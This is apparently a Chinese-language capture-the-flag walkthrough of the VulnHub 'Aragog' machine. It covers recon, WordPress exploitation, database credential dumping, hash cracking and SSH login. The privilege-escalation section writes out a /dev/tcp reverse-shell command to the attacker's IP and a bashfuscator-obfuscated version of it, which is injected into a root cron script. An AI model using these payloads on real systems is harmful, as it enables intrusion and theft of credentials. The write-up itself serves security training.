vulnhub - Aragog - writeup

信息收集

目标开放了80、22端口。

root@Lockly temp/tmp » arp-scan -I eth1 -l                                                     
Interface: eth1, type: EN10MB, MAC: 00:0c:29:fa:3d:23, IPv4: 192.168.56.106
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.100  08:00:27:4a:6c:d4       PCS Systemtechnik GmbH
192.168.56.107  08:00:27:c3:b4:ba       PCS Systemtechnik GmbH

2 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.159 seconds (118.57 hosts/sec). 2 responded
root@Lockly temp/tmp » nmap -A -sT -p-  --min-rate 6000 192.168.56.107 -o /root/temp/tmp/aragog/nmap.nmap 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-07 00:32 CST
Nmap scan report for 192.168.56.107
Host is up (0.0011s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 48:df:48:37:25:94:c4:74:6b:2c:62:73:bf:b4:9f:a9 (RSA)
|   256 1e:34:18:17:5e:17:95:8f:70:2f:80:a6:d5:b4:17:3e (ECDSA)
|_  256 3e:79:5f:55:55:3b:12:75:96:b4:3e:e3:83:7a:54:94 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:C3:B4:BA (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.05 ms 192.168.56.107

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.62 seconds

访问80页面只有一张图片，没有其他的信息。

将图片下载下来，并没有发现有隐藏的内容：

目录探测

gobuster扫到一个/blog路径：

root@Lockly tmp/aragog » gobuster dir -u http://192.168.56.107 -w /usr/share/dirb/wordlists/common.txt       
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.107
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 279]
/.hta                 (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/blog                 (Status: 301) [Size: 315] [--> http://192.168.56.107/blog/]
/index.html           (Status: 200) [Size: 97]
/javascript           (Status: 301) [Size: 321] [--> http://192.168.56.107/javascript/]
/server-status        (Status: 403) [Size: 279]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

域名解析

是一个wordpress站点，看这样需要解析域名，先挂着wpscan在后台扫先。

点击这些a标签调整，点log in的时候连接wordpress.aragog.hogwarts不上，那就是域名了，添加到/etc/hosts之后再访问，版本号5.0.12：

wpscan爆破WP-Admin这个用户无果，他的漏扫要整个api，注册一下就行。

扫的结果里面没有可以直接利用的rce，有些是插件的rce但没那个插件。

上msf搜这个版本的wordpress，找了一个比较新的rce尝试之后拿到shell。

去看wp的配置文件，里面又涉及到了另外一处的默认配置：/etc/wordpress/config-default.php。

MySQL脱裤

cat这个文件得到了数据库的登录凭据：root : mySecr3tPass。MySQL登录上去，在wp-users这个表中有一个用户hagrid98以及经过hash的密码。

www-data@Aragog:/usr/share/wordpress$ cat /etc/wordpress/config-default.php
cat /etc/wordpress/config-default.php
<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'mySecr3tPass');
define('DB_HOST', 'localhost');
define('DB_COLLATE', 'utf8_general_ci');
define('WP_CONTENT_DIR', '/usr/share/wordpress/wp-content');
?>
www-data@Aragog:/usr/share/wordpress$ mysql -u root -p
mysql -u root -p
Enter password: mySecr3tPass

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 78538
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| wordpress          |
+--------------------+
4 rows in set (0.009 sec)

MariaDB [(none)]> use wordpress;
use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [wordpress]> show tables;
show tables;
+-----------------------+
| Tables_in_wordpress   |
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_termmeta           |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
| wp_wpfm_backup        |
+-----------------------+
13 rows in set (0.001 sec)

MariaDB [wordpress]> select * from wp_users;
select * from wp_users;
+----+------------+------------------------------------+---------------+--------------------------+----------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass                          | user_nicename | user_email               | user_url | user_registered     | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+--------------------------+----------+---------------------+---------------------+-------------+--------------+
|  1 | hagrid98   | $P$BYdTic1NGSb8hJbpVEMiJaAiNJDHtc. | wp-admin      | [email protected] |          | 2021-03-31 14:21:02 |                     |           0 | WP-Admin     |
+----+------------+------------------------------------+---------------+--------------------------+----------+---------------------+---------------------+-------------+--------------+
1 row in set (0.001 sec)

MariaDB [wordpress]> 

破解凭据

用John来破解hash，得到登录凭据：hagrid98 ： password123。

root@Lockly tmp/aragog » john -w=/usr/share/wordlists/rockyou.txt hash 
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 512/512 AVX512BW 16x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
password123      (?)     
1g 0:00:00:00 DONE (2023-10-07 10:28) 1.785g/s 2742p/s 2742c/s 2742C/s 753951..mexico1
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed. 
root@Lockly tmp/aragog » 

ssh登录

登录上来在当前的目录下就有个txt文件，访问的内容一眼base64。解码一下是一句话。

root@Lockly tmp/aragog » ssh [email protected]     
The authenticity of host '192.168.56.107 (192.168.56.107)' can't be established.
ED25519 key fingerprint is SHA256:oAgAxZkRbtwe40/oXGuZbaPjiDWzluKXPpTv2r6TrAs.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.107' (ED25519) to the list of known hosts.
[email protected]'s password: 
Linux Aragog 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
hagrid98@Aragog:~$ pwd
/home/hagrid98
hagrid98@Aragog:~$ ls -al
total 28
drwxr-xr-x 3 hagrid98 hagrid98 4096 May  2  2021 .
drwxr-xr-x 4 root     root     4096 Apr  1  2021 ..
-rw-r--r-- 1 hagrid98 hagrid98  220 Apr  1  2021 .bash_logout
-rw-r--r-- 1 hagrid98 hagrid98 3526 Apr  1  2021 .bashrc
drwx------ 3 hagrid98 hagrid98 4096 Apr  1  2021 .gnupg
-rw-r--r-- 1 hagrid98 hagrid98   91 Apr  1  2021 horcrux1.txt
-rw-r--r-- 1 hagrid98 hagrid98  807 Apr  1  2021 .profile
hagrid98@Aragog:~$ cat horcrux1.txt 
horcrux_{MTogUmlkRGxFJ3MgRGlBcnkgZEVzdHJvWWVkIEJ5IGhhUnJ5IGluIGNoYU1iRXIgb2YgU2VDcmV0cw==}
hagrid98@Aragog:~$ 


root@Lockly tmp/aragog » echo "MTogUmlkRGxFJ3MgRGlBcnkgZEVzdHJvWWVkIEJ5IGhhUnJ5IGluIGNoYU1iRXIgb2YgU2VDcmV0cw==" | base64 -d                                                                                           1 ↵
1: RidDlE's DiAry dEstroYed By haRry in chaMbEr of SeCrets#

提权

传了linpease上来没有什么发现，传pspy上来看计划任务，发现有以root权限运行的一个备份脚本。

而且这个文件当前用户有权编辑，那就直接写一句话反弹shell，在写入之前先混淆一下语句。

root@Lockly bashfuscator/bin » ./bashfuscator -c "/bin/bash -i >& /dev/tcp/192.168.56.106/9999 0>&1"
[+] Mutators used: Command/Reverse -> Command/Case Swapper
[+] Payload:

  ${@} b"${@~~}"a""$'\163'\h ${*^^}   <<<   "$(      xYndeH='   ${@~}  "E"$'"'"'\166'"'"'""\A${*/36n&E$l}L "$(    ${@~}  ${*^}  ${*//fVf0G}REV <<<   '"'"'1&>0 9999/601.65.861.291/PCT/VED/ &> I- HSAB/NIB/'"'"' ${*^^}  ;   ${*/U<f<}  ${*/s:R./T@g3}    )"  ${*/o\,KdV5/m_,%h;} '   ${!@}  ; "${@^}"   ''p\r"i"n\t"""f"   %s "${xYndeH~~}" ${*/csZ$0_|k/UUfxuI?&}  ; ${*%%_ATm}   ${@~}  )" ${*~~}  ${*}  

[+] Payload size: 396 characters

写入/.baskup.sh等待一会拿到root权限，老地方/root有宝贝。